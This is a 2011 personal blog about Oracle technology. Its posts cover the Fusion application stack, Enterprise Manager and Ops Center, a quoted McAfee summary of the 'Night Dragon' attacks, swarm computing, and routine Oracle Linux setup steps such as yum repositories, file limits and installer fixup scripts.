Looking at the picture below you can get a glimpse of the stack which to which Oracle refers to as the Fusion stack. At the top we have the Oracle Fusion Application Product Families who consist out of a lot of Oracle e-Business Suite applications and modules and will be the new core of the Oracle Fusion applications. You can see the Oracle Fusion Middleware stack, I will be spending some blogpost in the upcoming time on them to explain them in more detail, you can see that most of this is based upon the Oracle Weblogic Server which is not a surprise to most of you.
 From a application point of view Oracle is dividing the applications in a couple of clustered which I will blog about more in the upcoming posts. Below you can see them in a slide from a Oracle presentation. To name them; Oracle Fusion Financial Management, Oracle Fusion Human Capital Management, Oracle Fusion Supply Chain Management, Oracle Fusion Project Portfolio Management, Oracle Fusion Procurement, Oracle Fusion Customer Relation Management and Oracle Fusion GRC or in full Oracle Fusion Governance, Risk and Compliancy.
As you can notice a great place is reserved in the stack for Oracle Enterprise Manager, this is a great part of the monitoring and maintenance stack from Oracle. What is missing in this picture is the hardware component of Oracle Enterprise Manager which has been added after the acquisition of Sun Microsystems and also the creation of the ExaData and ExaLogic machines. Oracle is now able to monitor all parts of the stack which includes both hardware and software.


Saturday, September 10, 2011

Oracle Enterprise Manager Cloud Management

As I am currently been working a lot on improving day to day operations and monitoring of large and complex IT landscapes I have been looking a lot at Oracle Enterprise Manager. We are currently deploying Oracle Enterprise Manager to be a the default monitoring and maintenance solution for a new cloud hosting platform. Oracle Enterprise Manager is great to manage parts of the cloud we are currently building and rolling out towards current customers and new customers of Capgemini

However, event hough when people think about cloud computing they tend to forget that their is still old school hardware and operating systems involved. Even though you can make all kind of thing scalable, virtual and cloud happy someone will always have to have a datacenter somewhere which holds racks and racks of servers which hold operating systems and which run things. By using cloud computing the customer is no longer that aware of the real infrastructure, if you however build the cloud you are more than aware of all the infrastructure it takes to build a cloud computing solution. When you are the provider of the cloud you will have to think about how to setup your network, how to arrange you storage and who to align failover technology, virtualization layers, monitoring and much more. 

As we as Capgemini are building a cloud computing solution especially for Oracle products we do have engineered Oracle Enterprise Manager already deep into the mainstream architecture. Oracle Enterprise Manager is giving us some very big advantages however thanks to Oracly buying Sun this is now extended with Oracle Ops Center.

When Oracle developed Oracle Enterprise Manager it was mainly focused on the applications and for some parts on the operating system where Sun was focusing more on the hardware and some parts of the operating system (mainly Sun Solaris). Now they two companies have become one the products are also merging which gives you a enormous lift and a single tool to monitor and manage software and hardware from the same tooling. Both can be used separately however can also be integrated. Currently the integration is not that fluently as you might want however as you see the Oracle roadmap the products will become more integrated every release they will bring out. 

Especially when you are building a complex and large-scale landscape like a cloud computing landscape for high-end customers running Oracle software it is of great value that you can monitor and maintain both your software, hardware and operating system from one single tool. Below you can see a short introduction video on Oracle Ops Center. If you have any questions on Oracle Ops Center and/or Oracle Enterprise Manager, leave a comment or drop me an e-mail.

Friday, August 05, 2011

Hacking from China

A very interesting whitepaper on security and hacking done by China (to be believed). I think this whitepaper is a very good read to get some more understanding in the basics of the role of china in the world of today.

"Starting in November 2009, coordinated covert and targeted cyberattacks have been conducted against global oil, energy, and petrochemical companies. These attacks have involved social engineering, spearphishing attacks, exploitation of Microsoft Windows operating systems vulnerabilities, Microsoft Active Directory compromises, and the use of remote administration tools (RATs) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations. We have identified the tools, techniques, and network activities used in these continuing attacks—which we have dubbed Night Dragon—as originating primarily in China. Through coordinated analysis of the related events and tools used, McAfee has determined identifying features to assist companies with detection and investigation. While we believe many actors have participated in these attacks, we have been able to identify one individual who has provided the crucial C&C infrastructure to the attackers."

Global Energy Cyber Attacks Night Dragon - McAfee

swarm computing

Swarm computing is thought to be the next version of cloud computing. Issue is that it is not quite clear what swarm computing is, and it is to some people not clear yet what cloud computing is. For all who are interested in swarm computing you can find some more information below:

"Computing is rapidly moving away from traditional computers.Of the 8 billion computing units will be deployed worldwide this year, only 150 million are stand-alone computers.Many programs in the future will run on collections of mobile processors interacting with the physical world and communicating over dynamic, ad hoc networks.We can view such a collection of devices as aswarm.As with natural swarms, such as a school of fish or an ant colony, the behavior of the swarm emerges from the simple behaviors of its individual members.The swarm is resilient to a small fraction of misbehaving members and to changes in the environment."

Swarm Computing

Also a very interesting source is this presentation from Oracle on swarm computing:

Monday, July 25, 2011

connect Oracle Linux to the public yum server

When you are installing a Oracle Linux system you most likely would like to keep it up to date. In a corporate environment you do not want to get updates and new software from a public location however when you are running a home system it can be very well that you would like to do this.

Oracle is providing to options, for corporate users you can connect to the Linux Support program by paying a fee towards Oracle. If you are not and just using the system for your home server for example you can connect to the public YUM server from Oracle. To be able to connect your system to the public yum server you have to simply take the following action:

# cd /etc/yum.repos.d
# wget

After this you have to open the downloaded file in vi and make sure that you enable the channels you want to use for updating from the public Yum server. To enable one you have to set enabled=1 instead of enabled=0.

now you use the yum command to upgrade, update and install new software to your system. The great plus for Yum is that dependencies are taken care of and downloaded and installed when needed instead of turing your day into a dependency solving nightmare.

Friday, July 22, 2011

Oracle hardnofiles softnofiles resolved

When you are installing a Oracle product under Linux you might run into an issue with the setting for hardnofiles and softnofiles which are set for the user running the installer and who will finally run the software on your server.

The failed check during installation will look something like the one below;

Checking for hardnofiles=4096; hardnofiles=1024. Failed <<<<
Checking for softnofiles=4096; softnofiles=1024. Failed <<<<

you can resolve this by setting a new limit for the user who will be installing and running the software (most likely the user Oracle) or by setting it system wide. To set it system wide you have to edit the file /etc/security/limits.conf and add the following lines to it;

* soft nofile 65536
* hard nofile 65536

you can change 65536 to any value you think is needed. If you do not want to make it a system wide value and have it set for a specific user you can change * for the username you want to set it for. For example change * for oracle and this value will only be set for Oracle.

Oracle database failed prerequisite

When you install a Oracle product you will hit the prerequisite page at one point in time. This will tell you what is missing on your system with respect to packages, kernel parameters and things like this. If you have a clean install of Oracle Linux you will hot some of those. In the below screenshot you see an example.

Something new is that you will now have an option to have some of those fixed automatically. Click the "Fix & Check Again" button and you will see that a script named is created under /tmp/.... you have to run this as root and this will solve some of your issues. This is much more easy than setting all the kernel parameters by hand.

[root@OEM CVU_11.]# ./
Response file being used is :./fixup.response
Enable file being used is :./fixup.enable
Log file location: ./orarun.log
Setting Kernel Parameters...
kernel.sem = 250 32000 100 128
fs.file-max = 6815744
net.ipv4.ip_local_port_range = 9000 65500
net.core.rmem_default = 262144
net.core.wmem_default = 262144
net.core.rmem_max = 4194304
net.core.wmem_max = 1048576
fs.aio-max-nr = 1048576
uid=500(oracle) gid=500(oinstall) groups=500(oinstall),501(oper),502(dba)
[root@OEM CVU_11.]#

Even do this is quite quick it is always good to know how this can also be done by hand, so do it also every now and then by hand just to keep your knowledge of Linux up to date.